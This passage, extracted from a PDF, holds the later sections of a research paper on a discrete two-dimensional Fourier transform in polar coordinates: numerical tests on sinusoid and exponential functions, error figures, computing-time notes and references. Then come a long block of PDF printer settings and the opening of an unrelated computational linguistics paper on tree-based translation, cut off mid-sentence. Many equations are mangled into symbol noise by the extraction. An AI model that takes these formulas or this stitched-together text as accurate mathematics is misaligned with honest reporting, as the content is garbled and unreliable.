Error trend between the sampled values of the continuous inverse transform and the discretely calculated values for a four-term sinusoid and sinc function, as a function of N2. Full-size DOI: 10.7717/peerj-cs.257/fig-22 Yao and Baddour (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.257 31/38 http://dx.doi.org/10.7717/peerj-cs.257/fig-21 http://dx.doi.org/10.7717/peerj-cs.257/fig-22 http://dx.doi.org/10.7717/peerj-cs.257 https://peerj.com/computer-science/ domain. Changing to N1 ¼ 381, the average error becomes −37.0 dB which proves that the large error is caused by the discontinuity. From Fig. 22, increasing N2 does not lead to worse results, which is different from previous cases. However, from Fig. 16 it can be seen that the function in the frequency domain does not have much information in the center area. So, even though increasing N2 causes a larger hole in the center as discussed in “Conclusion”, it does not lead to losing much energy which explains why Fig. 22 shows a different trend from the previous cases. Performing 2D-DFT and 2D-IDFT sequentially results in e ¼ 1:3117 � e�12 where e is calculated by Eq. (51). Four-term sinusoid and modified exponential For the next test function, the function is given by f ðr; uÞ ¼ e �ar r ½3 sinðuÞ þ sinð3uÞ þ 4 cosð10uÞ þ 12 sinð15uÞ� (58) Its continuous 2D-FT can be calculated as Fðr; cÞ ¼ �6pi sinðcÞ ffiffiffiffiffiffiffiffiffiffiffiffiffiffiffi r2 þ a2 p � a r ffiffiffiffiffiffiffiffiffiffiffiffiffiffiffi r2 þ a2 p þ 2pi sinð3cÞ ð ffiffiffiffiffiffiffiffiffiffiffiffiffiffiffi r2 þ a2 p � aÞ3 r3 ffiffiffiffiffiffiffiffiffiffiffiffiffiffiffi r2 þ a2 p � 8p cosð10cÞ ð ffiffiffiffiffiffiffiffiffiffiffiffiffiffiffi r2 þ a2 p � aÞ10 r10 ffiffiffiffiffiffiffiffiffiffiffiffiffiffiffi r2 þ a2 p þ 24pi sinð15cÞ ð ffiffiffiffiffiffiffiffiffiffiffiffiffiffiffi r2 þ a2 p � aÞ15 r15 ffiffiffiffiffiffiffiffiffiffiffiffiffiffiffi r2 þ a2 p (59) The graphs for the original function and the magnitude of its continuous 2D-FT with a = 0.1 are shown in Fig. 23. From Fig. 23, it can be observed that the function has a spike in both domains, which is a more difficult scenario based on the discussion in “Conclusion”. In this case, the function can be assumed as space-limited or band-limited. This function will be tested as being space-limited. Figure 23 Plots for (A) the original function and (B) the magnitude of its continuous 2D discrete Fourier transform with a = 0.1 for a four-term sinusoid and modified exponential function. Full-size DOI: 10.7717/peerj-cs.257/fig-23 Yao and Baddour (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.257 32/38 http://dx.doi.org/10.7717/peerj-cs.257/fig-23 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.257 From graph of the original function and its 2D-DFT, it can be assumed that f ðr; uÞ is effectively space-limited with R ¼ 20, and Fðr; cÞ is effectively band-limited with Wr ¼ 15, which gives j0N1 � 300. This results in N1 ¼ 96: However, since the function explodes at the center area in both domains, relatively large values of R and Wr should give a better approximation. Therefore, another case with R ¼ 40, Wr ¼ 30 is tested. In this case, N1 ¼ 383 is chosen. In the angular direction, the highest frequency term is 12 sinð15uÞ. From the sampling theorem, the sampling frequency should be at least twice of the highest frequency of signal. Thus, N2 ¼ 41 is chosen. Forward transform Here, the function is tested as a space limited function and Eqs. (14) and (15) are used to proceed with the forward and inverse transform in sequence. The error results with R ¼ 40; Wr ¼ 30; N1 ¼ 383 are shown in Fig. 24. The maximum value of the error is Errormax ¼ �10:1535 dB and this occurs at the center area. The average of the error is Erroraverage ¼ �32:7619 dB. This demonstrates that the discrete function approximates the sampled values of the continuous function quite well. Inverse transform The error results with R ¼ 40; Wr ¼ 30; N1 ¼ 383 are shown in Fig. 25. The maximum value of the error is Errormax ¼ 0:5579 dB and this occurs at the center. The average of the error isErroraverage ¼ �68:7317 dB. Performing 2D-DFT and 2D-IDFT results in e ¼ 1:421 � e�12, where e is calculated by Eq. (51). Figure 24 Error between the sampled values of the continuous forward transform and the discretely calculated values for the four-term sinusoid and modified exponential function with R = 40, Wp = 30 and N1 = 383. Full-size DOI: 10.7717/peerj-cs.257/fig-24 Yao and Baddour (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.257 33/38 http://dx.doi.org/10.7717/peerj-cs.257/fig-24 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.257 It can be observed that even for functions with the worst properties, the proposed transform can still be used to approximate the continuous FT with fairly small errors, as long as the function is sampled properly. SUMMARY AND CONCLUSION Accuracy and precision of the transform The proposed discrete 2D-FT in polar coordinates demonstrates an acceptable accuracy in providing discrete estimates to the continuous FT in polar coordinates. In Baddour & Chouinard (2015), Guizar-Sicairos & Gutiérrez-Vega (2004) and Higgins & Munson (1987), the one dimensional Hankel transform of a sinc function showed similar dynamic error, which could be used as a comparative measure. Since the DHT is one step of the proposed discrete 2D-FT, and the definition of the Hankel transform is based on Abbas, Sun & Foroosh (2017), a similar dynamic error should be expected. The test cases showed that the transform introduced very small errors (e ¼ 1:4004 � e�12 for worst case) by performing a forward transform and an inverse Figure 25 Error between the sampled values of the continuous inverse transform and the discretely calculated values for the four-term sinusoid and modified exponential function with R = 40, Wp = 30 and N1 = 383. Full-size DOI: 10.7717/peerj-cs.257/fig-25 Table 7 Computing time of three cases: Case1: Run the transform as matrixes in matrix without pre-calculating the Bessel zeros; Case2: Run the transform as DFT, DHT and IDFT in sequence without pre-calculating the Bessel zeros; Case3: Run the transform as DFT, DHT. Test cases Total computing time (s) Case 1 3,346.5 Case 2 321.1 Case 3 14.3 Yao and Baddour (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.257 34/38 http://dx.doi.org/10.7717/peerj-cs.257/fig-25 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.257 transform sequentially, which demonstrates that the discrete transform shows good precision. Guidelines of choosing sample size As discussed in “Conclusion” and proved by test cases, the sample size N1 (sample size in the radial direction) and N2 (sample size in the angular direction) do not have to be of the same order. For functions with different properties, sample size in the different directions could be very different. To approximate the continuous FT properly, sample size should be chosen based on the discussion in “Conclusion”. Interpretation of the transform By interpreting the transform as a 1DDFT, 1D DHT and 1D IDFT, the computing time of the transform is improved to a useful level since the FFT can be used to compute the DFT. APPENDIX: IMPROVING THE COMPUTING TIME OF THE TRANSFORM One of the advantages of the traditional FT is that the computing speed is fast by using the now well-established fft algorithm. To reduce the computing time of the 2D DFT in polar coordinates, the following steps are recommended: 1. Interpreting the transform as three sequential operations (DFT, DHT, IDFT) instead of a single four-dimensional matrix. 2. Pre-calculating and saving the Bessel zeros. Reducing computing time by interpreting the transform as three operations in sequence As explained above, the essence of the transform is that the matrix fpk is transformed into the matrix Fql. The intuitive way to interpret the transform kernel is to think of it as a four-dimensional matrix or matrices in a matrix. However, interpreting the transform as a 1D-DFT of each column, a 1D-DHT of each row and then a 1D-IDFT of each column makes it possible to use the Matlab built in functions fft and ifft, which significantly reduced the computational time. Reduce computing time by pre-calculating the Bessel Zeros After defining the transform as three operations in sequence and using the matrix for the DHT defined in Lozier (2003), it was found that a lot of computational time was used to calculate the Bessel zeros for every different test case, even though the Bessel zeros are the same in every case. Pre-calculating the Bessel zeros and storing the results for large numbers of N1 and N2 saves a lot of time. Table 7 shows the computing time of a forward transform on the same computer (Processor: Intel(R) Core(TM) i7-4710HQ CPU, RAM:12GB) for three cases: 1. Evaluate the transform as matrices in a matrix without pre-calculating the Bessel zeros. 2. Evaluate the transform as a DFT, DHT and IDFT in sequence without pre-calculating the Bessel zeros. Yao and Baddour (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.257 35/38 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.257 3. Evaluate the transform as a DFT, DHT and IDFT in sequence with pre-calculating the Bessel zeros. The Gaussian function was used as the test function therefore N1 ¼ 383 and N2 ¼ 15. From Table 7, it can be clearly observed that the computing time by running the transform as matrices in a matrix costs 3,346.5 s, which is not acceptable for the transform to be useful. Testing the transform as three operations turns 3,346.5 s into 321.1 s. This is much better. Finally, pre-calculating the Bessel Zeros makes the transform much faster and applicable. ADDITIONAL INFORMATION AND DECLARATIONS Funding This work was financially supported by the Natural Sciences and Engineering Research Council of Canada, grant number RGPIN-2016-04190. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: Natural Sciences and Engineering Research Council of Canada: RGPIN-2016-04190. Competing Interests The authors declare that they have no competing interests. Author Contributions � Xueyang Yao performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � Natalie Baddour conceived and designed the experiments, analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. Data Availability The following information was supplied regarding data availability: Sample Matlab code is available as a Supplemental File. REFERENCES Abbas SA, Sun Q, Foroosh H. 2017. An exact and fast computation of discrete Fourier transform for polar and spherical grid. IEEE Transactions on Signal Processing 65(8):2033–2048 DOI 10.1109/TSP.2016.2645510. Averbuch A, Coifman RR, Donoho DL, Elad M, Israeli M. 2006. Fast and accurate Polar Fourier transform. Applied and Computational Harmonic Analysis 21(2):145–167 DOI 10.1016/j.acha.2005.11.003. Baddour N. 2011. Two-dimensional Fourier transforms in polar coordinates. Advances in Imaging and Electron Physics 165:1–45. Yao and Baddour (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.257 36/38 http://dx.doi.org/10.7717/peerj-cs.257#supplemental-information http://dx.doi.org/10.1109/TSP.2016.2645510 http://dx.doi.org/10.1016/j.acha.2005.11.003 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.257 Baddour N. 2019. The discrete Hankel transform. In: Nikolic G, ed. Fourier Transforms: Century of Digitalization and Increasing Expectations. London: IntechOpen. Baddour N. 2019. Discrete two-dimensional Fourier transform in polar coordinates part I: theory and operational rules. Mathematics 7(8):698 DOI 10.3390/math7080698. Baddour N, Chouinard U. 2015. Theory and operational rules for the discrete Hankel transform. Journal of the Optical Society of America A 32(4):611–622 DOI 10.1364/JOSAA.32.000611. Baddour N, Chouinard U. 2017. Matlab code for the discrete Hankel transform. Journal of Open Research Software 5(1):4 DOI 10.5334/jors.82. Bracewell R. 1999. The Fourier transform and its applications. New York: McGraw-Hill. Cooley JW, Tukey JW. 1965. An algorithm for the machine calculation of complex Fourier series. Mathematics of Computation 19(90):297–301 DOI 10.1090/S0025-5718-1965-0178586-1. Dutt A, Rokhlin V. 1993. Fast Fourier transforms for nonequispaced data. SIAM Journal on Scientific Computing 14(6):1368–1393 DOI 10.1137/0914081. Dutt A, Rokhlin V. 1995. Fast Fourier transforms for nonequispaced data, II. Applied and Computational Harmonic Analysis 2(1):85–100 DOI 10.1006/acha.1995.1007. Fahimian BP, Zhao Y, Huang Z, Fung R, Mao Y, Zhu C, Khatonabadi M, DeMarco JJ, Osher SJ, McNitt-Gray MF, Miao J. 2013. Radiation dose reduction in medical X-ray CT via Fourier- based iterative reconstruction. Medical Physics 40(3):031914 DOI 10.1118/1.4791644. Fenn M, Kunis S, Potts D. 2007. On the computation of the polar FFT. Applied and Computational Harmonic Analysis 22(2):257–263 DOI 10.1016/j.acha.2006.05.009. Fessler JA, Sutton BP. 2003. Nonuniform fast Fourier transforms using min–max interpolation. IEEE Transactions on Signal Processing 51(2):560–574 DOI 10.1109/TSP.2002.807005. Fourmont K. 2003. Non-equispaced fast Fourier transforms with applications to tomography. Journal of Fourier Analysis and Applications 9(5):431–450 DOI 10.1007/s00041-003-0021-1. Guizar-Sicairos M, Gutiérrez-Vega JC. 2004. Computation of quasi-discrete Hankel transforms of integer order for propagating optical wave fields. Journal of the Optical Society of America A 21(1):53–58 DOI 10.1364/JOSAA.21.000053. Higgins W, Munson D Jr. 1987. An algorithm for computing general integer-order Hankel transforms. IEEE Transactions on Acoustics Speech and Signal Processing 35(1):86–97. Lee E, Fahimian BP, Iancu CV, Suloway C, Murphy GE, Wright ER, Castaño-Díez D, Jensen GJ, Miao J. 2008. Radiation dose reduction and image enhancement in biological imaging through equally-sloped tomography. Journal of Structural Biology 164(2):221–227 DOI 10.1016/j.jsb.2008.07.011. Lewitt RM, Matej S. 2003. Overview of methods for image reconstruction from projections in emission computed tomography. Proceedings of the IEEE 91(10):1588–1611 DOI 10.1109/JPROC.2003.817882. Lozier DW. 2003. NIST digital library of mathematical functions. Annals of Mathematics and Artificial Intelligence 38(1–3):105–119 DOI 10.1023/A:1022915830921. Plonka G, Potts D, Steidl G, Tasche M. 2018. Numerical Fourier analysis. Basel: Birkhäuser. Potts D, Steidl G, Tasche M. 2001. Fast Fourier transforms for nonequispaced data: a tutorial. In: Benedetto JJ, Ferreira PJSG, eds. Modern Sampling Theory: Mathematics and Applications. Boston: Birkhäuser Boston, 247–270. Poularikas AD. 2010. Transforms and applications handbook. Third Edition. Boca Raton: CRC Press. Yao and Baddour (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.257 37/38 http://dx.doi.org/10.3390/math7080698 http://dx.doi.org/10.1364/JOSAA.32.000611 http://dx.doi.org/10.5334/jors.82 http://dx.doi.org/10.1090/S0025-5718-1965-0178586-1 http://dx.doi.org/10.1137/0914081 http://dx.doi.org/10.1006/acha.1995.1007 http://dx.doi.org/10.1118/1.4791644 http://dx.doi.org/10.1016/j.acha.2006.05.009 http://dx.doi.org/10.1109/TSP.2002.807005 http://dx.doi.org/10.1007/s00041-003-0021-1 http://dx.doi.org/10.1364/JOSAA.21.000053 http://dx.doi.org/10.1016/j.jsb.2008.07.011 http://dx.doi.org/10.1109/JPROC.2003.817882 http://dx.doi.org/10.1023/A:1022915830921 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.257 Scott MC, Chen C-C, Mecklenburg M, Zhu C, Xu R, Ercius P, Dahmen U, Regan BC, Miao J. 2012. Electron tomography at 2.4-ångström resolution. Nature 483(7390):444 DOI 10.1038/nature10934. Shannon CE. 1984. Communication in the presence of noise. Proceedings of the IEEE 72(9):1192–1201 DOI 10.1109/PROC.1984.12998. Stark H. 1979. Sampling theorems in polar coordinates. Journal of the Optical Society of America 69(11):1519–1525 DOI 10.1364/JOSA.69.001519. Stark H, Wengrovitz M. 1983. Comments and corrections on the use of polar sampling theorems in CT. IEEE Transactions on Acoustics, Speech, and Signal Processing 31(5):1329–1331 DOI 10.1109/TASSP.1983.1164195. Xu Y, Feng D, Wang LV. 2002. Exact frequency-domain reconstruction for thermoacoustic tomography. I. Planar geometry. IEEE Transactions on Medical Imaging 21(7):823–828 DOI 10.1109/TMI.2002.801172. Yao and Baddour (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.257 38/38 http://dx.doi.org/10.1038/nature10934 http://dx.doi.org/10.1109/PROC.1984.12998 http://dx.doi.org/10.1364/JOSA.69.001519 http://dx.doi.org/10.1109/TASSP.1983.1164195 http://dx.doi.org/10.1109/TMI.2002.801172 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.257 Discrete two dimensional Fourier transform in polar coordinates part II: numerical computation and approximation of the continuous transform ... Introduction Definition of the discrete 2d ft in polar coordinates Discrete transform to approximate the continuous transform Discretization points and sampling grid Numerical computation of the transform Numerical evaluation of the 2d dft in polar coordinates to approximate the continuous ft Summary and conclusion Appendix: improving the computing time of the transform References << /ASCII85EncodePages false /AllowTransparency false /AutoPositionEPSFiles true /AutoRotatePages /None /Binding /Left /CalGrayProfile (Dot Gain 20%) /CalRGBProfile (sRGB IEC61966-2.1) /CalCMYKProfile (U.S. Web Coated \050SWOP\051 v2) /sRGBProfile (sRGB IEC61966-2.1) /CannotEmbedFontPolicy /Warning /CompatibilityLevel 1.4 /CompressObjects /Off /CompressPages true /ConvertImagesToIndexed true /PassThroughJPEGImages true /CreateJobTicket false /DefaultRenderingIntent /Default /DetectBlends true /DetectCurves 0.0000 /ColorConversionStrategy /LeaveColorUnchanged /DoThumbnails false /EmbedAllFonts true /EmbedOpenType false /ParseICCProfilesInComments true /EmbedJobOptions true /DSCReportingLevel 0 /EmitDSCWarnings false /EndPage -1 /ImageMemory 1048576 /LockDistillerParams false /MaxSubsetPct 100 /Optimize true /OPM 1 /ParseDSCComments true /ParseDSCCommentsForDocInfo true /PreserveCopyPage true /PreserveDICMYKValues true /PreserveEPSInfo true /PreserveFlatness true /PreserveHalftoneInfo false /PreserveOPIComments false /PreserveOverprintSettings true /StartPage 1 /SubsetFonts true /TransferFunctionInfo /Apply /UCRandBGInfo /Preserve /UsePrologue false /ColorSettingsFile (None) /AlwaysEmbed [ true ] /NeverEmbed [ true ] /AntiAliasColorImages false /CropColorImages true /ColorImageMinResolution 300 /ColorImageMinResolutionPolicy /OK /DownsampleColorImages false /ColorImageDownsampleType /Average /ColorImageResolution 300 /ColorImageDepth 8 /ColorImageMinDownsampleDepth 1 /ColorImageDownsampleThreshold 1.50000 /EncodeColorImages true /ColorImageFilter /FlateEncode /AutoFilterColorImages false /ColorImageAutoFilterStrategy /JPEG /ColorACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /ColorImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000ColorACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000ColorImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasGrayImages false /CropGrayImages true /GrayImageMinResolution 300 /GrayImageMinResolutionPolicy /OK /DownsampleGrayImages false /GrayImageDownsampleType /Average /GrayImageResolution 300 /GrayImageDepth 8 /GrayImageMinDownsampleDepth 2 /GrayImageDownsampleThreshold 1.50000 /EncodeGrayImages true /GrayImageFilter /FlateEncode /AutoFilterGrayImages false /GrayImageAutoFilterStrategy /JPEG /GrayACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /GrayImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000GrayACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000GrayImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasMonoImages false /CropMonoImages true /MonoImageMinResolution 1200 /MonoImageMinResolutionPolicy /OK /DownsampleMonoImages false /MonoImageDownsampleType /Average /MonoImageResolution 1200 /MonoImageDepth -1 /MonoImageDownsampleThreshold 1.50000 /EncodeMonoImages true /MonoImageFilter /CCITTFaxEncode /MonoImageDict << /K -1 >> /AllowPSXObjects false /CheckCompliance [ /None ] /PDFX1aCheck false /PDFX3Check false /PDFXCompliantPDFOnly false /PDFXNoTrimBoxError true /PDFXTrimBoxToMediaBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXSetBleedBoxToMediaBox true /PDFXBleedBoxToTrimBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXOutputIntentProfile (None) /PDFXOutputConditionIdentifier () /PDFXOutputCondition () /PDFXRegistryName () /PDFXTrapped /False /CreateJDFFile false /Description << /CHS <FEFF4f7f75288fd94e9b8bbe5b9a521b5efa7684002000500044004600206587686353ef901a8fc7684c976262535370673a548c002000700072006f006f00660065007200208fdb884c9ad88d2891cf62535370300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c676562535f00521b5efa768400200050004400460020658768633002> /CHT <FEFF4f7f752890194e9b8a2d7f6e5efa7acb7684002000410064006f006200650020005000440046002065874ef653ef5728684c9762537088686a5f548c002000700072006f006f00660065007200204e0a73725f979ad854c18cea7684521753706548679c300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c4f86958b555f5df25efa7acb76840020005000440046002065874ef63002> /DAN <FEFF004200720075006700200069006e0064007300740069006c006c0069006e006700650072006e0065002000740069006c0020006100740020006f007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e007400650072002000740069006c0020006b00760061006c00690074006500740073007500640073006b007200690076006e0069006e006700200065006c006c006500720020006b006f007200720065006b007400750072006c00e60073006e0069006e0067002e0020004400650020006f007000720065007400740065006400650020005000440046002d0064006f006b0075006d0065006e0074006500720020006b0061006e002000e50062006e00650073002000690020004100630072006f00620061007400200065006c006c006500720020004100630072006f006200610074002000520065006100640065007200200035002e00300020006f00670020006e0079006500720065002e> /DEU <FEFF00560065007200770065006e00640065006e0020005300690065002000640069006500730065002000450069006e007300740065006c006c0075006e00670065006e0020007a0075006d002000450072007300740065006c006c0065006e00200076006f006e002000410064006f006200650020005000440046002d0044006f006b0075006d0065006e00740065006e002c00200076006f006e002000640065006e0065006e002000530069006500200068006f00630068007700650072007400690067006500200044007200750063006b006500200061007500660020004400650073006b0074006f0070002d0044007200750063006b00650072006e00200075006e0064002000500072006f006f0066002d00470065007200e400740065006e002000650072007a0065007500670065006e0020006d00f60063006800740065006e002e002000450072007300740065006c006c007400650020005000440046002d0044006f006b0075006d0065006e007400650020006b00f6006e006e0065006e0020006d006900740020004100630072006f00620061007400200075006e0064002000410064006f00620065002000520065006100640065007200200035002e00300020006f0064006500720020006800f600680065007200200067006500f600660066006e00650074002000770065007200640065006e002e> /ESP <FEFF005500740069006c0069006300650020006500730074006100200063006f006e0066006900670075007200610063006900f3006e0020007000610072006100200063007200650061007200200064006f00630075006d0065006e0074006f0073002000640065002000410064006f0062006500200050004400460020007000610072006100200063006f006e00730065006700750069007200200069006d0070007200650073006900f3006e002000640065002000630061006c006900640061006400200065006e00200069006d0070007200650073006f0072006100730020006400650020006500730063007200690074006f00720069006f00200079002000680065007200720061006d00690065006e00740061007300200064006500200063006f00720072006500630063006900f3006e002e002000530065002000700075006500640065006e00200061006200720069007200200064006f00630075006d0065006e0074006f00730020005000440046002000630072006500610064006f007300200063006f006e0020004100630072006f006200610074002c002000410064006f00620065002000520065006100640065007200200035002e003000200079002000760065007200730069006f006e0065007300200070006f00730074006500720069006f007200650073002e> /FRA <FEFF005500740069006c006900730065007a00200063006500730020006f007000740069006f006e00730020006100660069006e00200064006500200063007200e900650072002000640065007300200064006f00630075006d0065006e00740073002000410064006f00620065002000500044004600200070006f007500720020006400650073002000e90070007200650075007600650073002000650074002000640065007300200069006d007000720065007300730069006f006e00730020006400650020006800610075007400650020007100750061006c0069007400e90020007300750072002000640065007300200069006d007000720069006d0061006e0074006500730020006400650020006200750072006500610075002e0020004c0065007300200064006f00630075006d0065006e00740073002000500044004600200063007200e900e90073002000700065007500760065006e0074002000ea0074007200650020006f007500760065007200740073002000640061006e00730020004100630072006f006200610074002c002000610069006e00730069002000710075002700410064006f00620065002000520065006100640065007200200035002e0030002000650074002000760065007200730069006f006e007300200075006c007400e90072006900650075007200650073002e> /ITA <FEFF005500740069006c0069007a007a006100720065002000710075006500730074006500200069006d0070006f007300740061007a0069006f006e00690020007000650072002000630072006500610072006500200064006f00630075006d0065006e00740069002000410064006f006200650020005000440046002000700065007200200075006e00610020007300740061006d007000610020006400690020007100750061006c0069007400e00020007300750020007300740061006d00700061006e0074006900200065002000700072006f006f0066006500720020006400650073006b0074006f0070002e0020004900200064006f00630075006d0065006e007400690020005000440046002000630072006500610074006900200070006f00730073006f006e006f0020006500730073006500720065002000610070006500720074006900200063006f006e0020004100630072006f00620061007400200065002000410064006f00620065002000520065006100640065007200200035002e003000200065002000760065007200730069006f006e006900200073007500630063006500730073006900760065002e> /JPN <FEFF9ad854c18cea51fa529b7528002000410064006f0062006500200050004400460020658766f8306e4f5c6210306b4f7f75283057307e30593002537052376642306e753b8cea3092670059279650306b4fdd306430533068304c3067304d307e3059300230c730b930af30c830c330d730d730ea30f330bf3067306e53705237307e305f306f30d730eb30fc30d57528306b9069305730663044307e305930023053306e8a2d5b9a30674f5c62103055308c305f0020005000440046002030d530a130a430eb306f3001004100630072006f0062006100740020304a30883073002000410064006f00620065002000520065006100640065007200200035002e003000204ee5964d3067958b304f30533068304c3067304d307e30593002> /KOR <FEFFc7740020c124c815c7440020c0acc6a9d558c5ec0020b370c2a4d06cd0d10020d504b9b0d1300020bc0f0020ad50c815ae30c5d0c11c0020ace0d488c9c8b85c0020c778c1c4d560002000410064006f0062006500200050004400460020bb38c11cb97c0020c791c131d569b2c8b2e4002e0020c774b807ac8c0020c791c131b41c00200050004400460020bb38c11cb2940020004100630072006f0062006100740020bc0f002000410064006f00620065002000520065006100640065007200200035002e00300020c774c0c1c5d0c11c0020c5f40020c2180020c788c2b5b2c8b2e4002e> /NLD (Gebruik deze instellingen om Adobe PDF-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. De gemaakte PDF-documenten kunnen worden geopend met Acrobat en Adobe Reader 5.0 en hoger.) /NOR <FEFF004200720075006b00200064006900730073006500200069006e006e007300740069006c006c0069006e00670065006e0065002000740069006c002000e50020006f0070007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740065007200200066006f00720020007500740073006b00720069006600740020006100760020006800f800790020006b00760061006c00690074006500740020007000e500200062006f007200640073006b0072006900760065007200200065006c006c00650072002000700072006f006f006600650072002e0020005000440046002d0064006f006b0075006d0065006e00740065006e00650020006b0061006e002000e50070006e00650073002000690020004100630072006f00620061007400200065006c006c00650072002000410064006f00620065002000520065006100640065007200200035002e003000200065006c006c00650072002000730065006e006500720065002e> /PTB <FEFF005500740069006c0069007a006500200065007300730061007300200063006f006e00660069006700750072006100e700f50065007300200064006500200066006f0072006d00610020006100200063007200690061007200200064006f00630075006d0065006e0074006f0073002000410064006f0062006500200050004400460020007000610072006100200069006d0070007200650073007300f5006500730020006400650020007100750061006c0069006400610064006500200065006d00200069006d00700072006500730073006f0072006100730020006400650073006b0074006f00700020006500200064006900730070006f00730069007400690076006f0073002000640065002000700072006f00760061002e0020004f007300200064006f00630075006d0065006e0074006f00730020005000440046002000630072006900610064006f007300200070006f00640065006d0020007300650072002000610062006500720074006f007300200063006f006d0020006f0020004100630072006f006200610074002000650020006f002000410064006f00620065002000520065006100640065007200200035002e0030002000650020007600650072007300f50065007300200070006f00730074006500720069006f007200650073002e> /SUO <FEFF004b00e40079007400e40020006e00e40069007400e4002000610073006500740075006b007300690061002c0020006b0075006e0020006c0075006f0074002000410064006f0062006500200050004400460020002d0064006f006b0075006d0065006e007400740065006a00610020006c0061006100640075006b006100730074006100200074007900f6007000f60079007400e400740075006c006f0073007400750073007400610020006a00610020007600650064006f007300740075007300740061002000760061007200740065006e002e00200020004c0075006f0064007500740020005000440046002d0064006f006b0075006d0065006e00740069007400200076006f0069006400610061006e0020006100760061007400610020004100630072006f0062006100740069006c006c00610020006a0061002000410064006f00620065002000520065006100640065007200200035002e0030003a006c006c00610020006a006100200075007500640065006d006d0069006c006c0061002e> /SVE <FEFF0041006e007600e4006e00640020006400650020006800e4007200200069006e0073007400e4006c006c006e0069006e006700610072006e00610020006f006d002000640075002000760069006c006c00200073006b006100700061002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740020006600f600720020006b00760061006c00690074006500740073007500740073006b0072006900660074006500720020007000e5002000760061006e006c00690067006100200073006b0072006900760061007200650020006f006300680020006600f600720020006b006f007200720065006b007400750072002e002000200053006b006100700061006400650020005000440046002d0064006f006b0075006d0065006e00740020006b0061006e002000f600700070006e00610073002000690020004100630072006f0062006100740020006f00630068002000410064006f00620065002000520065006100640065007200200035002e00300020006f00630068002000730065006e006100720065002e> /ENU (Use these settings to create Adobe PDF documents for quality printing on desktop printers and proofers. Created PDF documents can be opened with Acrobat and Adobe Reader 5.0 and later.) >> /Namespace [ (Adobe) (Common) (1.0) ] /OtherNamespaces [ << /AsReaderSpreads false /CropImagesToFrames true /ErrorControl /WarnAndContinue /FlattenerIgnoreSpreadOverrides false /IncludeGuidesGrids false /IncludeNonPrinting false /IncludeSlug false /Namespace [ (Adobe) (InDesign) (4.0) ] /OmitPlacedBitmaps false /OmitPlacedEPS false /OmitPlacedPDF false /SimulateOverprint /Legacy >> << /AddBleedMarks false /AddColorBars false /AddCropMarks false /AddPageInfo false /AddRegMarks false /ConvertColors /NoConversion /DestinationProfileName () /DestinationProfileSelector /NA /Downsample16BitImages true /FlattenerPreset << /PresetSelector /MediumResolution >> /FormElements false /GenerateStructure true /IncludeBookmarks false /IncludeHyperlinks false /IncludeInteractive false /IncludeLayers false /IncludeProfiles true /MultimediaHandling /UseObjectSettings /Namespace [ (Adobe) (CreativeSuite) (2.0) ] /PDFXOutputIntentProfileSelector /NA /PreserveEditing true /UntaggedCMYKHandling /LeaveUntagged /UntaggedRGBHandling /LeaveUntagged /UseDocumentBleed false >> ] >> setdistillerparams << /HWResolution [2400 2400] /PageSize [612.000 792.000] >> setpagedevice work_vbzp3iewy5h7rhfiok5o6i3du4 ---- Transactions of the Association for Computational Linguistics, 1 (2013) 243–254. Action Editor: Philipp Koehn. Submitted 12/2012; Revised 3/2013; Published 5/2013. c©2013 Association for Computational Linguistics. Unsupervised Tree Induction for Tree-based Translation Feifei Zhai, Jiajun Zhang, Yu Zhou and Chengqing Zong National Laboratory of Pattern Recognition, Institute of Automation, Chinese Academy of Sciences, Beijing, China {ffzhai,jjzhang,yzhou,cqzong}@nlpr.ia.ac.cn Abstract In current research, most tree-based translation models are built directly from parse trees. In this study, we go in another direction and build a translation model with an unsupervised tree structure derived from a novel non-parametric Bayesian model. In the model, we utilize synchronous tree substitution grammars (STSG) to capture the bilingual mapping between language pairs. To train the model efficiently, we develop a Gibbs sampler with three novel Gibbs operators. The sampler is capable of exploring the infinite space of tree structures by performing local changes on the tree nodes. Experimental results show that the string-to- tree translation system using our Bayesian tree structures significantly outperforms the strong baseline string-to-tree system using parse trees. 1 Introduction In recent years, tree-based translation models1 are drawing more and more attention in the community of statistical machine translation (SMT). Due to their remarkable ability to incorporate context structure information and long distance reordering into the translation process, tree-based translation models have shown promising 